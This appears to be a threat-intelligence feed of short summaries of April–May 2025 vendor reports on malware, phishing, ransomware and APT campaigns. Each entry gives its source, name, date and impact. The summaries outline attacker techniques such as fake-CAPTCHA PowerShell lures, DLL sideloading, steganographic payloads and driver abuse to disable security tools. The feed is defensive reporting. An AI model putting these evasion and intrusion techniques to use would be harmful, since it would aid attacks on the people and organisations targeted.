Summary:: Hunt.IO researchers have discovered a collection of hacking tools including SuperShell malware and Cobalt Strike beacons that were accessible on the internet. These tools were unintentionally exposed by threat actors while setting up their attack infrastructure. SuperShell is new C2 framework capable of targeting multiple operating systems by using secure SSH connections to control compromised machine. Additionally, the researchers also identified Cobalt Strike beacons using separate infrastructure and deceptive certificates impersonating jQuery to evade detection.

Source: https://hunt.io/blog/uncovering-supershell-and-cobalt-strike-from-an-open-directory

Intel Source:: Team Cymru

Intel Name:: ContagiousInterview_Campaign_Infrastructure

Date of Scan:: 2025-05-15

Impact:: LOW

Summary:: Team Cymru researchers have disclosed network infrastructure details associated with DPRK-linked actors conducting "ContagiousInterview" campaigns, observed over several years as of April 2025. The threat actors utilize front companies, such as BlockNovas LLC, with associated domains hosted on Russian infrastructure, specifically IP addresses assigned to TransTelecom and InvestStroyTrest. InvestStroyTrest operates a ferry service between Russia and North Korea from Rajin, KP, a service recently highlighted by a captured North Korean soldier, suggesting a potential link between the cyber infrastructure provider and physical logistics supporting DPRK objectives.

Source: https://x.com/teamcymru_S2/status/1915827990774063179

Intel Source:: Seqrite

Intel Name:: Swan_Vector_APT_Targets_East_Asia

Date of Scan:: 2025-05-15

Impact:: LOW

Summary:: Researchers from Seqrite Labs have discovered an innovative cyber-espionage campaign known as Swan Vector that targeted businesses in Taiwan and Japan, notably those in the education and mechanical engineering fields. The attackers use false resumes as decoys to deploy a four-stage malware chain that starts with a malicious LNK file and ends with the execution of Cobalt Strike shellcode. To avoid detection, the campaign use a variety of stealth techniques such as DLL sideloading, API hashing, and direct syscalls, while also exploiting legitimate tools such as RunDLL32.exe.

Source: https://www.seqrite.com/blog/swan-vector-apt-targeting-taiwan-japan-dll-implants/

Intel Source:: G-Data

Intel Name:: Chihuahua_Stealer

Date of Scan:: 2025-05-15

Impact:: LOW

Summary:: GDATA Security researchers have identified a new .NET based malware called Chihuahua Stealer which is capable of stealing sensitive information from compromised systems. It has first emerged in April 2025, spreading through a malicious PowerShell script hidden in a Google Drive document. Once executed, it mainly steals information from web browsers, cryptocurrency wallets and specific user files on the system. The malware leverage scheduled tasks for persistence and downloads additional payloads from backup servers. It compress the stolen data into a zip file with .chihuahua extension using AES-GCM encryption through Windows APIs. The encrypted data is then exfiltrated over HTTPS and malware attempt to delete its traces.

Source: https://www.gdatasoftware.com/blog/2025/05/38199-chihuahua-infostealer

Intel Source:: Nextron Systems

Intel Name:: Nitrogen_Dropping_Cobalt_Strike

Date of Scan:: 2025-05-15

Impact:: MEDIUM

Summary:: Nextron Systems researchers have observed activity by the Nitrogen ransomware group, first detected in September 2024 and expanding from North America to Africa and Europe. This group gains initial access primarily through malvertising campaigns, tricking users searching for legitimate software like WinSCP into downloading trojanized installers from compromised WordPress sites. These installers utilize DLL sideloading ("NitrogenLoader") to execute malicious code, ultimately deploying Cobalt Strike beacons. Nitrogen actors use the compromised host as a pivot point, leveraging Cobalt Strike for lateral movement and post-compromise actions while attempting to cover tracks by clearing Windows event logs.

Source: https://www.nextron-systems.com/2025/04/29/nitrogen-dropping-cobalt-strike-a-combination-of-chemical-elements/

Intel Source:: CERT-AGID

Intel Name:: SPID_Phishing_Campaign

Date of Scan:: 2025-05-15

Impact:: LOW

Summary:: CERT-AGID has identified a phishing campaign targeting SPID users by exploiting the AgID name and logo through a recently registered fake domain. The phishing emails with the subject line “Imminent SPID suspension: mandatory action” urge recipients to click an Update Documentation button that redirect them to a malicious site designed to steal SPID credentials, copies of identity documents and recognition videos.

Source: https://cert-agid.gov.it/news/campagna-di-phishing-spid-tramite-falso-dominio-agid/

Intel Source:: ISC.SANS

Intel Name:: Malware_Payload_via_Steganography

Date of Scan:: 2025-05-15

Impact:: LOW

Summary:: ISC.SANS researchers have detailed an instance in April 2025 where malware employed steganography to deliver a secondary payload. An initial .NET executable, identified as belonging to the XWorm family, utilized obfuscated strings and reflective code loading techniques. This initial malware downloaded a PNG image file from a public image hosting service. It then extracted a hidden executable payload embedded within the red pixel channel data of the image's top row. This secondary payload was subsequently loaded reflectively into memory for execution.

Source: https://isc.sans.edu/diary/Example%20of%20a%20Payload%20Delivered%20Through%20Steganography/31892

Intel Source:: ASEC

Intel Name:: Atomic_Stealer_Distributed_as_a_Crack_Program

Date of Scan:: 2025-05-15

Impact:: LOW

Summary:: ASEC researchers have identified the malware campaign in which a macOS information-stealer dubbed Atomic Stealer is being distributed as cracked software such as Evernote. When users visit these malicious sites, their device type is checked where macOS users redirect to the AMOS download page while Windows users are directed to LummaC2 malware. The Amos stealer employs AppleScript and system commands to steal browser data, keychain passwords, cryptocurrency wallet and other sensitive files. Additionally, the malware checks for virtual machine environments before compressing collected data and secretly sends it to the attacker's server via HTTP POST requests.

Source: https://asec.ahnlab.com/ko/87730/

Intel Source:: Any.Run

Intel Name:: Pentagon_Stealer

Date of Scan:: 2025-05-15

Impact:: LOW

Summary:: ANY.RUN researchers have detailed the emergence and evolution of Pentagon Stealer, an information-stealing malware observed since early March 2024, targeting cryptocurrency assets and user credentials. Initially identified in Golang and Python variants, the malware steals browser data (credentials, cookies), crypto wallet information (Atomic, Exodus), Discord/Telegram tokens, and specific files, communicating stolen data via HTTP POST requests to command and control (C2) servers. Key techniques include launching browsers in debug mode to bypass DPAPI and steal cookies directly, and replacing wallet application files (app.asar) with modified versions to capture mnemonics and passwords. The Python version employs multi-stage, AES-encrypted delivery, while the Golang version appeared later in attack chains involving NSIS installers.

Source: https://any.run/cybersecurity-blog/pentagon-stealer-malware-analysis/

Intel Source:: Hunt.IO

Intel Name:: APT36_Spoofs_Indias_Defence_Portal

Date of Scan:: 2025-05-15

Impact:: HIGH

Summary:: Hunt.io researchers have identified an attack campaign employing APT36-style ClickFix techniques, observed in March 2025, spoofing India's Ministry of Defence to deliver cross-platform malware. The operation involved cloning the Ministry's press release portal, using attacker-controlled domains mimicking official subdomains, and directing visitors based on their operating system (Windows or Linux) to specific pages designed to facilitate malware execution via clipboard hijacking. Windows users were served an HTA payload via mshta.exe after a spoofed "For Official Use Only" warning, while Linux users were prompted to execute a shell script downloaded from a likely compromised .in domain following a fake CAPTCHA lure.

Source: https://hunt.io/blog/apt36-clickfix-campaign-indian-ministry-of-defence

Intel Source:: Google Security Operations

Intel Name:: Unveiling_LUMMAC_V2

Date of Scan:: 2025-05-15

Impact:: MEDIUM

Summary:: Google Security Operations have detailed the LUMMAC.V2 (aka Lumma, Lummastealer) infostealer, a C++ rework of the original LUMMAC credential stealer featuring a binary morpher. This malware, often distributed via malicious search results leading to fake CAPTCHA pages ("ClickFix" technique), tricks users into executing PowerShell commands via the Run dialog. The initial PowerShell loader fetches subsequent stages, which Mandiant has observed employing varied execution methods including DLL search order hijacking, process hollowing (targeting BitlockerToGo.exe), and obfuscated AutoIt-based droppers performing anti-analysis checks. LUMMAC.V2 establishes persistence via registry Run keys and targets a wide array of sensitive data including browser credentials, cryptocurrency wallets, password managers, email clients, system details, and screenshots, exfiltrating the stolen information as a ZIP archive over HTTP to Cloudflare-fronted command-and-control servers.

Source: https://www.googlecloudcommunity.com/gc/Community-Blog/Finding-Malware-Unveiling-LUMMAC-V2-with-Google-Security/ba-p/899110

Intel Source:: Fortinet

Intel Name:: Horabot_Malware_Campaign

Date of Scan:: 2025-05-14

Impact:: MEDIUM

Summary:: Researchers from Fortinet have uncovered a malware campaign named Horabot targeting Spanish-speaking users across Latin America. The threat actor leveraging phishing emails masquerading as legitimate invoices, embedding malicious HTML attachments that initiate a multi stage infection chain using VBScript, AutoIt and PowerShell. The malware performs environmental checks to evade antivirus and virtual machines before establishing persistence. Once established, it collects system information, extracts Outlook contacts and steals browser credentials. It also leverages Outlook COM automation to spread laterally by sending phishing emails from compromised accounts, enabling data exfiltration and the deployment of additional banking trojans.

Source: https://www.fortinet.com/blog/threat-research/horabot-unleashed-a-stealthy-phishing-threat

Intel Source:: Genians Security Center

Intel Name:: Operation_ToyBox_Story

Date of Scan:: 2025-05-14

Impact:: HIGH

Summary:: Genians Security Center (GSC) detailed "Operation: ToyBox Story," a March 2025 spear-phishing campaign by the North Korean state-sponsored group APT37 targeting activists focused on North Korea. Using lures disguised as South Korean national security think tank invitations or information on North Korean troops in Russia, the campaign delivered malicious LNK files via Dropbox links within emails. Execution of the LNK file triggers a multi-stage infection chain involving hidden PowerShell commands, shellcode injection, and the deployment of the RokRAT backdoor, which harvests system information and screenshots for exfiltration. APT37 leverages legitimate cloud platforms like Dropbox, pCloud, and Yandex as command-and-control (C2) infrastructure, demonstrating a "Living off Trusted Sites" approach to evade detection. This continued reliance on cloud services and fileless techniques for payload delivery underscores APT37's persistent espionage objectives and presents a significant challenge for signature-based defenses, necessitating robust endpoint detection and response (EDR) capabilities and anomaly hunting to identify and mitigate the threat.

Source: https://www.genians.co.kr/en/blog/threat_intelligence/toybox-story

Intel Source:: Socket

Intel Name:: Malicious_PyPI_Package_Targets_Discord_Developers

Date of Scan:: 2025-05-14

Impact:: LOW

Summary:: Socket Research Team has discovered a malicious Python package called discordpydebug targeting Discord developers. This package masqueraded as non-malicious tool for logging application errors but actually contained a hidden Remote Access Trojan (RAT). Once installed, it connects to a server controlled by attackers, enabling them the to run commands, read and write files and exfiltrate sensitive data such as tokens and credentials from compromised developer systems .The package was downloaded over 11,000 times before it was taken down.

Source: https://socket.dev/blog/malicious-pypi-package-targets-discord-developers-with-RAT

Intel Source:: Microsoft

Intel Name:: Marbled_Dust

Date of Scan:: 2025-05-13

Impact:: HIGH

Summary:: Microsoft Threat Intelligence reports that since April 2024, the Türkiye-affiliated espionage actor Marbled Dust has exploited a zero-day directory traversal vulnerability (CVE-2025-27920) in the Output Messenger chat application. The actor targets entities associated with the Kurdish military operating in Iraq, consistent with Marbled Dust's previously observed regional targeting priorities aimed at furthering Turkish government interests. After gaining authenticated access to the Output Messenger Server Manager, potentially via intercepted credentials from DNS hijacking or typo-squatting, Marbled Dust exploits the vulnerability to deploy VBScripts and a GoLang backdoor, enabling command-and-control communication and data exfiltration. This campaign signifies an increase in Marbled Dust's technical sophistication through the use of a zero-day exploit, posing a substantial espionage risk, as compromise grants attackers broad access to sensitive communications and user data within the targeted organization.

Source: https://www.microsoft.com/en-us/security/blog/2025/05/12/marbled-dust-leverages-zero-day-in-output-messenger-for-regional-espionage/

Intel Source:: NTT Security

Intel Name:: WaterPlum_Using_OtterCookie_Malware_New_Features

Date of Scan:: 2025-05-13

Impact:: MEDIUM

Summary:: NTT Security researchers have observed the continued evolution of OtterCookie malware, utilized by the North Korea-linked threat actor WaterPlum (also known as Famous Chollima or PurpleBravo). OtterCookie, first identified in September 2024, targets financial institutions, cryptocurrency operators, and FinTech companies worldwide. The latest versions, v3 (observed February 2025) and v4 (observed April 2025), introduce enhanced stealer capabilities. Version 3 added an upload module for exfiltrating documents, images, and cryptocurrency-related files from non-Windows environments. Version 4 further expands functionality with two new stealer modules: one decrypts and steals Google Chrome credentials using DPAPI, while another exfiltrates MetaMask, Chrome, Brave browser credentials, and macOS credentials without decryption.

Source: https://jp.security.ntt/tech_blog/en-waterplum-ottercookie

Intel Source:: Socket

Intel Name:: Cursor_IDE_Hijacked_via_Malicious_NPM

Date of Scan:: 2025-05-13

Impact:: LOW

Summary:: Socket researchers have identified the discovery of three malicious npm packages (sw-cur, sw-cur1, aiide-cur) targeting macOS developers using the popular Cursor AI code editor. Published by threat actors using aliases gtr2018 and aiide, these packages masqueraded as tools offering a cheap Cursor API, luring developers seeking cost savings. Upon execution, the malware steals Cursor credentials, fetches an AES-encrypted secondary payload from actor-controlled infrastructure, decrypts it, and overwrites the editor's core main.js file, establishing persistent backdoor access within the trusted IDE environment; one variant also disabled auto-updates.

Source: https://socket.dev/blog/malicious-npm-packages-hijack-cursor-editor-on-macos?utm_medium=feed

Intel Name:: PupkinStealer

Date of Scan:: 2025-05-13

Impact:: LOW

Summary:: Cyfirma researchers have discovered a new infostealer malware called PupkinStealer that first emerged in April 2025 and linked to be Russian origin named Ardent. This malware is written in .NET and designed to steal sensitive information from Window systems. This infostealer targets saved passwords from browsers like Chrome, Edge and Opera, desktop files, steals session data from Telegram and Discord, and takes screenshots. Once the data is collected then stored in a temporary folder, zipped into a file named with the victim’s username and sent to the attacker using the Telegram Bot API.

Source: https://www.cyfirma.com/research/pupkinstealer-a-net-based-info-stealer/

Intel Source:: Forescout

Intel Name:: Chinese_Group_Exploiting_SAP_Vulnerability

Date of Scan:: 2025-05-12

Impact:: MEDIUM

Summary:: Researchers at Forescout have observed that CVE-2025-31324, a critical deserialization vulnerability in SAP NetWeaver Visual Composer 7.x, is being actively exploited in the wild by a Chinese threat actor tracked as Chaya_004. Exploitation, observed since at least April 29, involves POST requests to the /developmentserver/metadatauploader endpoint to upload web shells, facilitating remote code execution and potential full system takeover. The threat actor's infrastructure includes servers, many hosted on Chinese cloud providers, hosting Supershell backdoors and various Chinese-origin penetration testing tools.

Source: https://www.forescout.com/blog/threat-analysis-sap-vulnerability-exploited-in-the-wild-by-chinese-threat-actor/

Intel Source:: Picus Security

Intel Name:: Lumma_Infostealer_GitHub_Campaign

Date of Scan:: 2025-05-12

Impact:: LOW

Summary:: Lumma Stealer, an information-stealing malware offered as a Malware-as-a-Service (MaaS) since August 2022, has seen a significant surge in use throughout 2024-2025, with Picus Security reported a 369% increase in infections in late 2024. Financially motivated cybercriminals, including affiliates like the "Stargazer Goblin" group, leverage Lumma Stealer to harvest credentials, banking information, and cryptocurrency wallets. Operators primarily abuse trusted platforms like GitHub for initial access, using spearphishing links in fake issue comments or bogus security team notifications to distribute trojanized installers, often disguised as fixes or legitimate tools. Other tactics include malvertising campaigns leading to fake CAPTCHA pages that trick users into executing malicious PowerShell commands. Lumma employs numerous defense evasion techniques such as "Living off the Land" (using legitimate tools like mshta.exe, PowerShell, WMI), payload encryption, sandbox detection, and process hollowing. Stolen data is typically exfiltrated via HTTP/HTTPS to attacker C2 servers.

Source: https://www.picussecurity.com/resource/blog/lumma-infostealer-continues-its-github-social-engineering-campaign

Intel Source:: ASEC

Intel Name:: BPFDoor_Linux_Malware_Activity

Date of Scan:: 2025-05-12

Impact:: MEDIUM

Summary:: Researchers at AhnLab have observed the continuous exploitation of the Linux-based backdoor malware BPFDoor in recent hacking attacks, as detailed in a new alert and a related hash notification from KISA. Initially described in an October 2024 ASEC blog article, BPFDoor remains a continuous threat due to its open-source nature, which allows for the ongoing distribution of multiple modified strains.

Source: https://asec.ahnlab.com/en/87863/

Intel Source:: Intrinsec

Intel Name:: Eye_Pyramid_C2

Date of Scan:: 2025-05-11

Impact:: MEDIUM

Summary:: Intrinsec researchers discovered that several major ransomware groups such as RansomHub, Rhysida, Vice Society and BlackCat are leveraging same C2 infrastructure based on the open source called Eye Pyramid framework. The investigation began by Analyzing RansomHub’s Python-based backdoor and uncovered a network of connected servers, some hosted on bulletproof services linked through common JSON error message from the Eye Pyramid tool. These threat actors leverage Eye Pyramid for post-compromise activities, including EDR evasion and the in-memory deployment of tools like Cobalt Strike and Sliver which eventually leads to ransomware attacks.

Source: https://www.intrinsec.com/ip-cluster-linking-ransomware-activity-and-eye-pyramid-c2/?cn-reloaded=1

Intel Source:: Google Cloud

Intel Name:: Hunting_Malicious_Desktop_Files

Date of Scan:: 2025-05-11

Impact:: MEDIUM

Summary:: Researchers from Google have observed an evolution in attacks where threat actors infect Linux systems using malicious [.]desktop files. The malicious files are often disguised as shortcuts to documents like PDFs but actually contain hidden code that downloads and executes malware such as cryptominers. When a user opens the legitimate looking files, they secretly execute malicious code in the background. These attacks take advantage of standard Linux desktop features found in environments like XFCE, GNOME, and KDE. This tactic particularly affecting users in India and Australia.

Source: https://www.googlecloudcommunity.com/gc/Community-Blog/Actionable-threat-hunting-with-Google-Threat-Intelligence-I/ba-p/895333

Intel Source:: Trellix

Intel Name:: The_Growing_Threat_of_Vishing

Date of Scan:: 2025-05-11

Impact:: LOW

Summary:: Researchers from Trelix have observed a rise in advanced voice phishing campaign where cybercriminals leverage email attachments to trick people into calling fake support numbers. These cybercriminals impersonate well-known organisations like PayPal and send emails that contain minimal text but include attachments such as PDFs, images and MP4 and WebP files to create urgency. When victims call on fake support numbers, the attackers use social engineering tactics to manipulate victims to share sensitive information such as login credentials and financial details which often leads to unauthorized transactions.

Source: https://www.trellix.com/blogs/research/the-growing-threat-of-vishing-how-cybercriminals-are-using-multimedia-to-target-you/

Intel Source:: GuidePoint

Intel Name:: Intrusion_of_Interlock_Ransomware

Date of Scan:: 2025-05-11

Impact:: MEDIUM

Summary:: Researchers at GuidePoint have uncovered a cyber-attack by interlock ransomware in which attackers trick users into downloading SocGholish malware through fake human verification pop-ups compromised legitimate website. Once initial access is gained, Interlock operators install NetSupportRAT to maintain persistent in the system, perform network scanning, and escalate their privileges using techniques such as hijacking Microsoft 365 sessions and stealing credentials from LastPass. Afterward, the attackers use a renamed version of the AZCopy tool to transfer sensitive data to attackers-controlled cloud storage. Finally, they deploy the Interlock ransomware leveraging tools like PSExec or even Group Policies Object to spread across systems, locking users out and encrypting data.

Source: https://www.guidepointsecurity.com/blog/interesting-interlock-intrusion-how-interlock-achieves-encryption/

Intel Source:: Fortinet

Intel Name:: Multilayered_Email_Attack

Date of Scan:: 2025-05-11

Impact:: LOW

Summary:: FortiGuard researchers have uncovered a multilayered email campaign targeting organizations in Spain, Italy, and Portugal. The attackers are distributing a Java-based RAT called Ratty by sending deceptive PDF invoice attachments via a legitimate Spanish email service provider. When victims open the PDF and click the link inside, they are taken through various steps such as file-sharing services like Dropbox and MediaFire, a fake CAPTCHA page and a hidden server using Ngrok to deliver the malware. The campaign uses smart evasion technique like geo-blocking, so only users in specific countries (Italy) receive the actual malware while others just see a malicious document. Once malware is installed on Windows, Linux, or macOS, it gives attackers full control, allowing them to execute commands, steal files, record keystrokes and even turn on webcams or microphones.

Source: https://www.fortinet.com/blog/threat-research/multilayered-email-attack-how-a-pdf-invoice-and-geofencing-led-to-rat-malware

Intel Source:: Proofpoint

Intel Name:: CoGUI_Phish_Kit_Targeting_Japan

Date of Scan:: 2025-05-10

Impact:: MEDIUM

Summary:: Researchers at Proofpoint have observed a high-volume phishing campaign leveraging a kit named CoGUI, primarily targeting Japanese organizations since at least October 2024, with activity peaking in January 2025 with over 172 million messages. The CoGUI phishing kit, likely operated by multiple Chinese-speaking threat actors, impersonates well-known consumer and finance brands such as Amazon, PayPay, and Rakuten, with the objective of stealing usernames, passwords, and payment data. It employs advanced evasion techniques including geofencing, header fencing, and browser fingerprinting to selectively target users, primarily in Japan, though less frequent campaigns have targeted Australia, New Zealand, Canada, and the United States. Although similar in some aspects to the Darcula phishing kit, CoGUI is distinct.

Source: https://www.proofpoint.com/us/blog/threat-insight/cogui-phish-kit-targets-japan-millions-messages

Intel Source:: Google Cloud

Intel Name:: COLDRIVER_Using_LOSTKEYS_Malware

Date of Scan:: 2025-05-10

Impact:: MEDIUM

Summary:: Researchers from Google have discovered a new malware called LOSTKEYS linked to Russian threat actor named COLDRIVER aka UNC4057 and Star Blizzard. Initially, the group focused on stealing credential through phishing emails but now they have incorporated malware to exfiltrate documents and system information from Western governments, NGOs, former diplomats, journalists and individuals linked to Ukraine. The attackers lure victims to a fraudulent website displaying a fake CAPTCHA which instructs them to copy and execute a PowerShell command that initiate a multi-stage process which installs the malware. The final payload executes a VBS scripts that searches for files with specific extensions and directories, stealing them along with system information. The primary goal of COLDRIVER’s operations is to collect the intelligence in support of Russia’s strategic interests.

Source: https://cloud.google.com/blog/topics/threat-intelligence/coldriver-steal-documents-western-targets-ngos/

Intel Source:: Any.Run

Intel Name:: Nitrogen_Ransomware

Date of Scan:: 2025-05-10

Impact:: MEDIUM

Summary:: Researchers from Any.Run have uncovered a new ransomware group named Nitrogen Ransomware which has been active since at least September 2024, primarily targeting the financial, construction, manufacturing, and tech sectors in the United States, Canada and the United Kingdom. The group’s modus operandi involves encrypting critical data and demanding ransoms. It leverages various technique such as creating a unique mutex before encryption, exploiting a legitimate but vulnerable driver to disable antivirus and endpoint detection and modifying system setting with the bcdedit.exe to disable Windows Safe Boot and system recovery. Researchers also believe a possible link between Nitrogen and LukaLocker ransomware group based on similar file extensions and ransom notes.

Source: https://any.run/cybersecurity-blog/nitrogen-ransomware-report/

Intel Source:: Datadog Security Labs

Intel Name:: RedisRaider_Campaign

Date of Scan:: 2025-05-10

Impact:: MEDIUM

Summary:: Researchers from DataDog have identified an advanced Linux cryptojacking campaign that actively exploiting publicly accessible Redis server. The attackers deploy Go-based worm that scan the internet for vulnerable Redis servers. Once a target is found, they abuse legitimate Redis functionality to install scheduled tasks that download and run a customized Monero (XMR) cryptocurrency miner. They also execute web-based Monero miner hosted on their own servers, indicating multiple methods to make money. The malware employs significant obfuscation through tools like Garble and custom payload packing and includes anti-forensics techniques to avoid detection. If the attack is successful, it can slow down affected systems, drain resources and potentially open the door to more serious breaches.

Source: https://securitylabs.datadoghq.com/articles/redisraider-weaponizing-misconfigured-redis/

Intel Source:: Symantec

Intel Name:: Play_Ransomware_Leveraged_Windows_Zero_day

Date of Scan:: 2025-05-09

Impact:: MEDIUM

Summary:: Symantec researchers uncovered that attackers linked to Play ransomware group also known as Balloonfly leveraged a zero-day Windows privilege escalation vulnerability (CVE-2025-29824) during attempted attack against a U.S. organisation prior to the vulnerability's disclosure and patching on April 8, 2025. Although, no ransomware payload deployed, the attackers used a custom information-stealer called Grixba along with several hacking tools. They took advantage of a bug in the Common Log File System (CLFS) kernel driver by manipulating system memory, allowing them to steal sensitive data, create an admin account, and delete artifacts. Microsoft reported only a few organizations in the U.S., Venezuela, Spain, and Saudi Arabia were targeted, potentially by multiple actors including Storm-2460 before the patch was released.

Source: https://www.security.com/threat-intelligence/play-ransomware-zero-day

Intel Source:: ISC.SANS

Intel Name:: Evolving_Malware_via_Dynamic_Modules

Date of Scan:: 2025-05-09

Impact:: LOW

Summary:: Researchers at ISC.SANS have noticed a growing trend in malware development in which attackers use "modular" tactics to improve the functionality of their malware only when necessary. This strategy, like on-demand library loading in software development, enables malware to grow its capabilities based on the environment it infects. For example, a malware sample classified as a Discord RAT is programmed to scan a victim's PC for specified targets, such as SAP-related files, before dynamically fetching additional modules from a Command and Control server to expand its reach. This strategy not only minimizes the initial size of the malware, but it also makes it appear less suspicious, allowing it to avoid detection.

Source: https://isc.sans.edu/diary/rss/31928

Intel Source:: Palo Alto

Intel Name:: Tax_Return_Scam_and_Phishing_Alert

Date of Scan:: 2025-04-29

Impact:: MEDIUM

Summary:: In the past four months, numerous newly registered domains with tax return themes have emerged. Unit42 researchers have identified several phishing and scam campaigns exploiting the U.S. tax return season.

Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2025-04-15-IOCs-for-tax-return-related-phishing-and-scams.txt

Intel Source:: Securelist

Intel Name:: Outlaw_A_Crypto_Mining_Botnet

Date of Scan:: 2025-04-29

Impact:: MEDIUM

Summary:: Researchers at Securelist have uncovered a cyberattack by a group called Outlaw also known as Dota. It is a Perl-based crypto mining botnet targeting Linux systems primarily for cryptojacking. The botnet targeted system in the U.S., Brazil, Germany, and several Asian countries by taking advantage of weak SSH credentials on misconfigured accounts like suporte to gain unauthorized access. After gaining access, the attackers used Linux tools like wget and curl to download malicious scripts and compressed files. The malware then removed other cryptominers and installed its customized XMRig to use system’s resources to mine Monero cryptocurrency. The botnet-maintained persistence by modifying SSH keys, disguising itself as legitimate processes and leveraging an IRC-based backdoor for remote access.

Source: https://securelist.com/outlaw-botnet/116444/

Intel Source:: Hunt.IO

Intel Name:: Track_APT34_Like_Infra_Early

Date of Scan:: 2025-04-28

Impact:: MEDIUM

Summary:: Hunt.io researchers have identified command-and-control infrastructure exhibiting similarities to APT34 (OilRig) TTPs being staged between November 2024 and April 2025, though currently dormant from a payload perspective. The operators registered domains impersonating an Iraqi academic institute and several fictitious UK-based technology firms (using .eu TLDs), hosted primarily on M247 infrastructure.

Source: https://hunt.io/blog/track-apt34-like-infrastructure-before-it-strikes

Intel Source:: Hunt.IO

Intel Name:: KeyPlug_Malware_Exposure

Date of Scan:: 2025-04-28

Impact:: LOW

Summary:: Researchers from Hunt.IO have discovered that a briefly exposed server linked to KeyPlug malware infrastructure likely associated with RedGolf/APT41 provided a rare glimpse into active adversary operations. The server, which stayed live for less than 24 hours, included Fortinet firewall and VPN exploit scripts, a PHP-based webshell capable of AES and XOR-decrypted payload execution, and reconnaissance tools targeting authentication, development, and identity portals of a big Japanese corporation.

Source: https://hunt.io/blog/keyplug-server-exposes-fortinet-exploits-webshells

Intel Source:: Hunt.IO

Intel Name:: Targeted_Phishing_Using_PHP_Kits

Date of Scan:: 2025-04-28

Impact:: LOW

Summary:: Hunt.io researchers have discovered an active server-side phishing campaign targeting employee and member portals via a PHP-based phishing kit. Unlike previous approaches, which relied on client-side redirects to validate stolen credentials, the most recent approach performs similar tests server-side, apparently hinder analysis and limit visibility.

Source: https://hunt.io/blog/server-side-phishing-evasion-employee-portals

Intel Source:: ASEC

Intel Name:: XLoader_Infostealer_Exploits_Past_Vulnerability

Date of Scan:: 2025-04-28

Impact:: LOW

Summary:: ASEC researchers have uncovered a phishing campaign that distribute the XLoader info-stealer malware through emails disguised as purchase or order confirmations. These emails trick recipients into opening a DOCX attachment that secretly contains a malicious RTF file exploiting a known vulnerability (CVE-2017-11882) in Microsoft’s Equation Editor. When the file is opened, it runs the hidden script that launches the Xloader malware using tool called HorusProtector to inject the malicious payload into a legitimate process.

Source: https://asec.ahnlab.com/ko/87689/

Intel Source:: Cyfirma

Intel Name:: Hannibal_Stealer

Date of Scan:: 2025-04-28

Impact:: LOW

Summary:: Cyfirma researchers have identified a data-stealing malware called Hannibal Stealer. This malware first emerged in February 2025 and is an enhanced version of Sharp and TX stealers. The Hannibal Stealer targets web browsers like Chrome and Firefox to extract saved data, cryptocurrency wallets such as MetaMask, Exodus, and Monero and FTP clients like FileZilla and Total Commander. Additionally, It can also hijack clipboard data to steal cryptocurrency transactions, capture VPN credentials, steal Telegram and Discord session data and extract screenshots and specific files from compromise machines.

Source: https://www.cyfirma.com/research/hannibal-stealer-a-rebranded-threat-born-from-sharp-and-tx-lineage/

Intel Source:: Trend Micro

Intel Name:: CrazyHunter_Targets_Taiwanese_Critical_Sectors

Date of Scan:: 2025-04-28

Impact:: MEDIUM

Summary:: Trend Micro researchers have discovered a ransomware campaign called CrazyHunter that is actively targeting Taiwan's significant sectors, such as healthcare, education, and industrial enterprises. The group has demonstrated advanced capabilities by using the Bring Your Own Vulnerable Driver (BYOVD) technique to bypass security controls and incorporating a diverse set of open-source tools from platforms such as GitHub, including the Prince Ransomware Builder and ZammoCide, accounting for roughly 80% of their toolkit.

Source: https://www.trendmicro.com/en_us/research/25/d/crazyhunter-campaign.html

Intel Source:: Esentire

Intel Name:: RansomHub_Tactics_via_SocGholish

Date of Scan:: 2025-04-28

Impact:: MEDIUM

Summary:: Researchers at eSentire have identified a cyberattack in early March 2025 that employed SocGholish (also known as FakeUpdates) malware to capture system information and deliver a ZIP archive with a Python-based backdoor tied to RansomHub affiliates. RansomHub, a Ransomware-as-a-Service (RaaS) group founded in 2024, targets high-profile companies and promotes its services on the RAMP (Russian Anonymous Market Place) forum.

Source: https://www.esentire.com/blog/socket-puppet-how-ransomhub-affiliates-pull-the-strings

Intel Source:: Sophos

Intel Name:: Stego_Campaign_delivers_AsyncRAT

Date of Scan:: 2025-04-28

Impact:: LOW

Summary:: Sophos Researchers have discovered a malware campaign where attackers hide malicious code inside images using technique called steganography. The attack begins with phishing emails that trick users into opening MS office document. When opened, it runs a hidden script that download a modified Windows script file which triggers a PowerShell script that secretly downloads an image file containing malicious code. The script which includes DLL files that uses process hollowing technique to load the tool known as AsyncRAT. This tool gives attackers full access over the victim’s system, allowing them to spy on users, log keystrokes, control the desktop remotely and even deploy ransomware.

Source: https://medium.com/@andrew.petrus/stego-campaign-delivers-asyncrat-446cba118c6b

Intel Source:: Silent Push

Intel Name:: Power_Parasites_Scam_Campaign

Date of Scan:: 2025-04-28

Impact:: LOW

Summary:: Silent Push researchers have discovered an ongoing scam campaign known as "Power Parasites," which uses false websites, social media groups, and Telegram channels to carry out bogus job and investment scams. The campaign, which primarily targets individuals in Asian countries such as Bangladesh, Nepal, and India, impersonates large worldwide businesses, particularly those in the energy sector.

Source: https://www.silentpush.com/blog/power-parasites/?utm_source=rss&utm_medium=rss&utm_campaign=power-parasites

Intel Source:: Any.Run

Intel Name:: How_Tycoon2FA_Phishing_Chooses_Its_Victims

Date of Scan:: 2025-04-27

Impact:: MEDIUM

Summary:: ANY.RUN researchers have analyzed a sophisticated phishing technique employed by the Tycoon2FA threat actor, utilizing geolocation and system fingerprinting to selectively target users in Argentina, Brazil, and the Middle East (UTC-3, UTC+2 to +4 timezones). Observed in April 2025, the attack begins when a user visits a newly registered domain hosted on AS-CHOOPA infrastructure. An initial benign redirect is triggered, but just before it occurs, a hidden image tag executes a fingerprinting script via its onerror event. This script collects system details (screen resolution, user agent, timezone, GPU info) and POSTs them to the server. Only if the fingerprint and geolocation match the attacker's target criteria does the server respond with a redirect to the actual Tycoon2FA phishing page; otherwise, users are sent to legitimate sites like Tesla or Emirates.

Source: https://x.com/anyrun_app/status/1914999622881235340

Intel Source:: ASEC

Intel Name:: LNK_Malware_Targets_Korean_Users

Date of Scan:: 2025-04-27

Impact:: LOW

